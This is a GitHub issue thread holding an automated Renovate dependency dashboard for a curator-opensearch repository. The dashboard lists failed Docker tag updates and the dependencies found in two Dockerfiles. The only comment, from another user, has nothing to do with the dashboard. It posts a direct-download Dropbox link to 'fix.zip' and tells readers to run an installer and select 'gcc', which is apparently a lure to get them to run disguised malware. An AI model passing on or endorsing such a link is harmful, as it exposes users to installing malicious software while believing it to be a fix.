### ISSUE TITLE
Dependency Dashboard

### ISSUE THREAD

**Issue by alexey-igrychev** [uzhinskiy/curator-opensearch#37]
This issue lists Renovate updates and detected dependencies. Read the [Dependency Dashboard](https://docs.renovatebot.com/key-concepts/dashboard/) docs to learn more.

## Repository problems

Renovate tried to run on this repository, but found these problems.

 - WARN: Error updating branch

## Errored

These updates encountered an error and will be retried. Click on a checkbox below to force a retry now.

 - [ ] Pin dependencies (`alpine`, `centos`, `python`)
 - [ ] Update alpine Docker tag to v3.20
 - [ ] Update python Docker tag to v3.12
 - [ ] Update centos Docker tag to v8

## Detected dependencies

<details><summary>dockerfile</summary>
<blockquote>

<details><summary>Dockerfile</summary>

 - `python 3.11-alpine3.17`
 - `alpine 3.17`

</details>

<details><summary>unix_packages/builder_image/Dockerfile</summary>

 - `centos 6`

</details>

</blockquote>
</details>

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
